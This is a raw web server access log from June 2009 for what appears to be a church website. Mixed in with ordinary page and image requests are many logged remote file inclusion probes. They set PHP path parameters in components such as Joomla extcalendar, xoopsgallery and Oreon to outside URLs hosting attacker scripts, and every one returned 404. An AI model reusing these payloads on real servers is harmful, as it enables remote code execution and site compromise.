217.147.29.190 - - [28/Jun/2009:07:23:59 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 361
217.147.29.190 - - [28/Jun/2009:07:24:00 -0400] "GET /log//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 334
210.205.57.2 - - [28/Jun/2009:07:25:22 -0400] "GET /log/sdaglobal.org-access_log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 345
210.205.57.2 - - [28/Jun/2009:07:25:23 -0400] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 316
210.205.57.2 - - [28/Jun/2009:07:25:24 -0400] "GET /log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.peb.com.ua/ua/pid.txt??? HTTP/1.1" 404 320
211.206.120.187 - - [28/Jun/2009:07:27:25 -0400] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 325
211.206.120.187 - - [28/Jun/2009:07:27:26 -0400] "GET /log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 329
211.206.120.187 - - [28/Jun/2009:07:27:27 -0400] "GET /log/sdaglobal.org-access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 354
208.115.111.248 - - [28/Jun/2009:07:31:18 -0400] "GET /robots.txt HTTP/1.1" 404 291
99.238.42.247 - - [28/Jun/2009:07:35:04 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
65.23.158.226 - - [28/Jun/2009:07:35:38 -0400] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 333
65.23.158.226 - - [28/Jun/2009:07:35:38 -0400] "GET /log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 337
65.23.158.226 - - [28/Jun/2009:07:35:38 -0400] "GET /log/sdaglobal.org-access_log.2//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 364
98.80.30.82 - - [28/Jun/2009:07:36:16 -0400] "GET / HTTP/1.1" 200 9432
98.80.30.82 - - [28/Jun/2009:07:36:17 -0400] "GET /_themes/sda/lebkgnd.jpg HTTP/1.1" 200 4389
98.80.30.82 - - [28/Jun/2009:07:36:17 -0400] "GET /_derived/index.html_cmp_sda010_bnr.gif HTTP/1.1" 200 9017
98.80.30.82 - - [28/Jun/2009:07:36:17 -0400] "GET /images/welcome.gif HTTP/1.1" 200 2565
98.80.30.82 - - [28/Jun/2009:07:36:17 -0400] "GET /images/select.gif HTTP/1.1" 200 1792
98.80.30.82 - - [28/Jun/2009:07:36:17 -0400] "GET /images/english.gif HTTP/1.1" 200 2582
98.80.30.82 - - [28/Jun/2009:07:36:17 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
98.80.30.82 - - [28/Jun/2009:07:36:17 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
98.80.30.82 - - [28/Jun/2009:07:36:17 -0400] "GET /images/czech.gif HTTP/1.1" 200 1137
98.80.30.82 - - [28/Jun/2009:07:36:17 -0400] "GET /images/filipino.gif HTTP/1.1" 200 1328
98.80.30.82 - - [28/Jun/2009:07:36:17 -0400] "GET /images/france.gif HTTP/1.1" 200 1094
98.80.30.82 - - [28/Jun/2009:07:36:17 -0400] "GET /images/germany.gif HTTP/1.1" 200 986
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/hungary.gif HTTP/1.1" 200 1115
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/india.gif HTTP/1.1" 200 1050
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/italy.gif HTTP/1.1" 200 1095
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/japan.gif HTTP/1.1" 200 1104
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/korea.gif HTTP/1.1" 200 1387
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/nepal.gif HTTP/1.1" 200 1130
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/portugal.gif HTTP/1.1" 200 1322
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/russia.gif HTTP/1.1" 200 1039
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/spain.gif HTTP/1.1" 200 1360
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/sweden.gif HTTP/1.1" 200 1104
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/thailand.gif HTTP/1.1" 200 1060
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/vietnam.gif HTTP/1.1" 200 1055
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/3abn.gif HTTP/1.1" 200 3774
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/vop.jpg HTTP/1.1" 200 2215
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/bibsab.gif HTTP/1.1" 200 2786
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/hopeint.jpg HTTP/1.1" 200 2596
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/iiw.jpg HTTP/1.1" 200 2052
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/amazfact.gif HTTP/1.1" 200 2896
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/amazdisc.gif HTTP/1.1" 200 3426
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/omega.gif HTTP/1.1" 200 956
98.80.30.82 - - [28/Jun/2009:07:36:18 -0400] "GET /images/promesy.gif HTTP/1.1" 200 2097
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/bibplus.gif HTTP/1.1" 200 3598
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/hopetalk.gif HTTP/1.1" 200 3618
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/knowjes.gif HTTP/1.1" 200 3848
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/teachart.gif HTTP/1.1" 200 1484
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/gawake.gif HTTP/1.1" 200 3422
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/crusade.jpg HTTP/1.1" 200 4146
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/coming.jpg HTTP/1.1" 200 4137
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/voh.gif HTTP/1.1" 200 2001
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/nimenqu.gif HTTP/1.1" 200 3797
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/lamb.gif HTTP/1.1" 200 1920
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/lamp.gif HTTP/1.1" 200 2052
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/tempcat.jpg HTTP/1.1" 200 2385
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/biblight.gif HTTP/1.1" 200 2510
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/lgtbearer.gif HTTP/1.1" 200 1337
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/bibuniv.gif HTTP/1.1" 200 1078
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/newstart.gif HTTP/1.1" 200 2173
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/fuyinchina.gif HTTP/1.1" 200 4865
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/ligtlife.gif HTTP/1.1" 200 2954
98.80.30.82 - - [28/Jun/2009:07:36:19 -0400] "GET /images/bibleinfo.gif HTTP/1.1" 200 1949
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/revival.gif HTTP/1.1" 200 3110
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/gcclub.gif HTTP/1.1" 200 2947
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/ellenwhite.gif HTTP/1.1" 200 2251
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/24seven.gif HTTP/1.1" 200 1352
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/wrlcrisis.gif HTTP/1.1" 200 2123
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/advtoday.gif HTTP/1.1" 200 2122
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/sign.gif HTTP/1.1" 200 3556
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/shenyang.jpg HTTP/1.1" 200 4020
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/anxiyuan.gif HTTP/1.1" 200 2006
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/creatn.gif HTTP/1.1" 200 3508
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/zjjs.gif HTTP/1.1" 200 1559
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/garhvn.jpg HTTP/1.1" 200 1992
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/truth7.gif HTTP/1.1" 200 3910
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/gce.jpg HTTP/1.1" 200 4416
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/kowloon.gif HTTP/1.1" 200 3883
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/region.gif HTTP/1.1" 200 1356
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/twchurch.gif HTTP/1.1" 200 3454
98.80.30.82 - - [28/Jun/2009:07:36:20 -0400] "GET /images/bayview.gif HTTP/1.1" 200 2926
98.80.30.82 - - [28/Jun/2009:07:36:21 -0400] "GET /images/taipei.gif HTTP/1.1" 200 4499
98.80.30.82 - - [28/Jun/2009:07:36:21 -0400] "GET /images/auccf.gif HTTP/1.1" 200 2436
98.80.30.82 - - [28/Jun/2009:07:36:21 -0400] "GET /images/hacienda.gif HTTP/1.1" 200 2351
98.80.30.82 - - [28/Jun/2009:07:36:21 -0400] "GET /favicon.ico HTTP/1.1" 404 292
98.80.30.82 - - [28/Jun/2009:07:36:24 -0400] "GET /favicon.ico HTTP/1.1" 404 292
65.23.158.226 - - [28/Jun/2009:07:36:40 -0400] "GET /log/sdaglobal.org-error_log.1//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 363
218.234.21.178 - - [28/Jun/2009:07:37:17 -0400] "GET /log/sdaglobal.org-access_log.2//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 364
218.234.21.178 - - [28/Jun/2009:07:37:17 -0400] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 333
218.234.21.178 - - [28/Jun/2009:07:37:17 -0400] "GET /log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 337
115.43.142.119 - - [28/Jun/2009:07:38:59 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
218.234.21.178 - - [28/Jun/2009:07:39:01 -0400] "GET /log/sdaglobal.org-error_log.1//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 363
115.43.142.119 - - [28/Jun/2009:07:39:02 -0400] "GET / HTTP/1.1" 200 9432
115.43.142.119 - - [28/Jun/2009:07:39:03 -0400] "GET /images/welcome.gif HTTP/1.1" 200 2565
115.43.142.119 - - [28/Jun/2009:07:39:03 -0400] "GET /_themes/sda/lebkgnd.jpg HTTP/1.1" 200 4389
115.43.142.119 - - [28/Jun/2009:07:39:03 -0400] "GET /_derived/index.html_cmp_sda010_bnr.gif HTTP/1.1" 200 9017
115.43.142.119 - - [28/Jun/2009:07:39:03 -0400] "GET /images/select.gif HTTP/1.1" 200 1792
115.43.142.119 - - [28/Jun/2009:07:39:03 -0400] "GET /images/english.gif HTTP/1.1" 200 2582
115.43.142.119 - - [28/Jun/2009:07:39:03 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
115.43.142.119 - - [28/Jun/2009:07:39:03 -0400] "GET /images/czech.gif HTTP/1.1" 200 1137
115.43.142.119 - - [28/Jun/2009:07:39:03 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
115.43.142.119 - - [28/Jun/2009:07:39:03 -0400] "GET /images/filipino.gif HTTP/1.1" 200 1328
115.43.142.119 - - [28/Jun/2009:07:39:04 -0400] "GET /_derived/index.html_cmp_sda010_bnr.gif HTTP/1.1" 200 9017
115.43.142.119 - - [28/Jun/2009:07:39:04 -0400] "GET /_themes/sda/lebkgnd.jpg HTTP/1.1" 200 4389
115.43.142.119 - - [28/Jun/2009:07:39:04 -0400] "GET /images/welcome.gif HTTP/1.1" 200 2565
115.43.142.119 - - [28/Jun/2009:07:39:04 -0400] "GET /images/select.gif HTTP/1.1" 200 1792
115.43.142.119 - - [28/Jun/2009:07:39:04 -0400] "GET /images/english.gif HTTP/1.1" 200 2582
115.43.142.119 - - [28/Jun/2009:07:39:04 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
115.43.142.119 - - [28/Jun/2009:07:39:04 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
115.43.142.119 - - [28/Jun/2009:07:39:04 -0400] "GET /images/filipino.gif HTTP/1.1" 200 1328
115.43.142.119 - - [28/Jun/2009:07:39:04 -0400] "GET /images/czech.gif HTTP/1.1" 200 1137
115.43.142.119 - - [28/Jun/2009:07:39:04 -0400] "GET /images/france.gif HTTP/1.1" 200 1094
115.43.142.119 - - [28/Jun/2009:07:39:05 -0400] "GET /images/hungary.gif HTTP/1.1" 200 1115
115.43.142.119 - - [28/Jun/2009:07:39:05 -0400] "GET /images/germany.gif HTTP/1.1" 200 986
115.43.142.119 - - [28/Jun/2009:07:39:05 -0400] "GET /images/india.gif HTTP/1.1" 200 1050
115.43.142.119 - - [28/Jun/2009:07:39:05 -0400] "GET /images/italy.gif HTTP/1.1" 200 1095
115.43.142.119 - - [28/Jun/2009:07:39:05 -0400] "GET /images/japan.gif HTTP/1.1" 200 1104
115.43.142.119 - - [28/Jun/2009:07:39:05 -0400] "GET /images/nepal.gif HTTP/1.1" 200 1130
115.43.142.119 - - [28/Jun/2009:07:39:05 -0400] "GET /images/korea.gif HTTP/1.1" 200 1387
115.43.142.119 - - [28/Jun/2009:07:39:05 -0400] "GET /images/portugal.gif HTTP/1.1" 200 1322
115.43.142.119 - - [28/Jun/2009:07:39:05 -0400] "GET /images/russia.gif HTTP/1.1" 200 1039
115.43.142.119 - - [28/Jun/2009:07:39:05 -0400] "GET /images/spain.gif HTTP/1.1" 200 1360
115.43.142.119 - - [28/Jun/2009:07:39:05 -0400] "GET /images/sweden.gif HTTP/1.1" 200 1104
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/vietnam.gif HTTP/1.1" 200 1055
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/thailand.gif HTTP/1.1" 200 1060
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/3abn.gif HTTP/1.1" 200 3774
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/vop.jpg HTTP/1.1" 200 2215
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/bibsab.gif HTTP/1.1" 200 2786
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/hopeint.jpg HTTP/1.1" 200 2596
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/iiw.jpg HTTP/1.1" 200 2052
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/amazfact.gif HTTP/1.1" 200 2896
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/amazdisc.gif HTTP/1.1" 200 3426
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/omega.gif HTTP/1.1" 200 956
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/promesy.gif HTTP/1.1" 200 2097
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/bibplus.gif HTTP/1.1" 200 3598
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/hopetalk.gif HTTP/1.1" 200 3618
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/knowjes.gif HTTP/1.1" 200 3848
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/teachart.gif HTTP/1.1" 200 1484
115.43.142.119 - - [28/Jun/2009:07:39:06 -0400] "GET /images/gawake.gif HTTP/1.1" 200 3422
115.43.142.119 - - [28/Jun/2009:07:39:07 -0400] "GET /images/crusade.jpg HTTP/1.1" 200 4146
115.43.142.119 - - [28/Jun/2009:07:39:07 -0400] "GET /images/coming.jpg HTTP/1.1" 200 4137
115.43.142.119 - - [28/Jun/2009:07:39:07 -0400] "GET /images/gd.gif HTTP/1.1" 304 -
115.43.142.119 - - [28/Jun/2009:07:39:07 -0400] "GET /images/voh.gif HTTP/1.1" 200 2001
115.43.142.119 - - [28/Jun/2009:07:39:07 -0400] "GET /images/nimenqu.gif HTTP/1.1" 200 3797
115.43.142.119 - - [28/Jun/2009:07:39:07 -0400] "GET /images/lamb.gif HTTP/1.1" 200 1920
115.43.142.119 - - [28/Jun/2009:07:39:07 -0400] "GET /images/lamp.gif HTTP/1.1" 200 2052
115.43.142.119 - - [28/Jun/2009:07:39:08 -0400] "GET /images/gd.gif HTTP/1.1" 304 -
65.23.158.226 - - [28/Jun/2009:07:39:26 -0400] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 333
65.23.158.226 - - [28/Jun/2009:07:39:26 -0400] "GET /log/sdaglobal.org-access_log.2//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 364
65.23.158.226 - - [28/Jun/2009:07:39:26 -0400] "GET /log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 337
218.234.21.178 - - [28/Jun/2009:07:39:44 -0400] "GET /log/sdaglobal.org-access_log.2//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 364
218.234.21.178 - - [28/Jun/2009:07:39:44 -0400] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 333
218.234.21.178 - - [28/Jun/2009:07:39:48 -0400] "GET /log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 337
65.23.158.226 - - [28/Jun/2009:07:40:31 -0400] "GET /log/sdaglobal.org-error_log.1//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 363
64.6.232.171 - - [28/Jun/2009:07:40:52 -0400] "GET /playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 306
64.6.232.171 - - [28/Jun/2009:07:40:52 -0400] "GET /log/playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 310
209.51.133.202 - - [28/Jun/2009:07:40:57 -0400] "GET /playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 306
209.51.133.202 - - [28/Jun/2009:07:40:57 -0400] "GET /log/playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 310
209.51.133.202 - - [28/Jun/2009:07:41:04 -0400] "GET /playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 306
209.51.133.202 - - [28/Jun/2009:07:41:04 -0400] "GET /log/playing.php/common/db.php?commonpath=http://www.masuccessguy.com//docs/book?? HTTP/1.1" 404 310
216.246.98.115 - - [28/Jun/2009:07:41:24 -0400] "GET /log//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 378
216.246.98.115 - - [28/Jun/2009:07:41:24 -0400] "GET /log/sdaglobal.org-access_log//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 403
218.234.21.178 - - [28/Jun/2009:07:41:24 -0400] "GET /log/sdaglobal.org-error_log.1//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 363
216.246.98.115 - - [28/Jun/2009:07:41:25 -0400] "GET //joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 374
216.246.98.115 - - [28/Jun/2009:07:41:27 -0400] "GET //joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 374
216.246.98.115 - - [28/Jun/2009:07:41:27 -0400] "GET /log//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 378
216.246.98.115 - - [28/Jun/2009:07:41:27 -0400] "GET /log/sdaglobal.org-access_log//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 403
216.246.98.115 - - [28/Jun/2009:07:41:29 -0400] "GET //joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 374
216.246.98.115 - - [28/Jun/2009:07:41:29 -0400] "GET /log//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 378
216.246.98.115 - - [28/Jun/2009:07:41:29 -0400] "GET /log/sdaglobal.org-access_log//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 403
211.189.18.73 - - [28/Jun/2009:07:42:29 -0400] "GET /log//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 378
211.189.18.73 - - [28/Jun/2009:07:42:29 -0400] "GET //joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 374
211.189.18.73 - - [28/Jun/2009:07:42:29 -0400] "GET /log/sdaglobal.org-access_log//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 403
217.147.29.190 - - [28/Jun/2009:07:42:35 -0400] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 324
217.147.29.190 - - [28/Jun/2009:07:42:35 -0400] "GET /log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 328
217.147.29.190 - - [28/Jun/2009:07:42:35 -0400] "GET /log/sdaglobal.org-access_log.2//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 355
216.246.98.115 - - [28/Jun/2009:07:44:01 -0400] "GET /log/sdaglobal.org-access_log%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 405
216.246.98.115 - - [28/Jun/2009:07:44:05 -0400] "GET /log/sdaglobal.org-access_log%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 405
216.246.98.115 - - [28/Jun/2009:07:44:09 -0400] "GET /log/sdaglobal.org-access_log%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 405
65.55.106.157 - - [28/Jun/2009:07:44:35 -0400] "GET /robots.txt HTTP/1.1" 404 291
65.23.158.226 - - [28/Jun/2009:07:44:41 -0400] "GET /log/sdaglobal.org-error_log.4//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 363
217.147.29.190 - - [28/Jun/2009:07:45:00 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 357
217.147.29.190 - - [28/Jun/2009:07:45:44 -0400] "GET /log/sdaglobal.org-access_log%20%20//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 355
211.189.18.73 - - [28/Jun/2009:07:45:47 -0400] "GET /log/sdaglobal.org-access_log%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 405
216.75.60.116 - - [28/Jun/2009:07:47:43 -0400] "GET /log//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 317
216.75.60.116 - - [28/Jun/2009:07:47:44 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 313
216.75.60.116 - - [28/Jun/2009:07:48:08 -0400] "GET /log//skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 317
216.75.60.116 - - [28/Jun/2009:07:48:08 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 313
65.23.158.226 - - [28/Jun/2009:07:49:11 -0400] "GET /log/sdaglobal.org-error_log.4//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 363
65.55.106.157 - - [28/Jun/2009:07:49:36 -0400] "GET / HTTP/1.1" 304 -
218.234.21.178 - - [28/Jun/2009:07:51:21 -0400] "GET /log/sdaglobal.org-error_log.4//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 363
86.109.166.161 - - [28/Jun/2009:07:52:20 -0400] "GET /log/sdaglobal.org-access_log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 328
86.109.166.161 - - [28/Jun/2009:07:52:20 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 299
86.109.166.161 - - [28/Jun/2009:07:52:20 -0400] "GET /log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.unreals.co.cc/perkosa.txt??? HTTP/1.1" 404 303
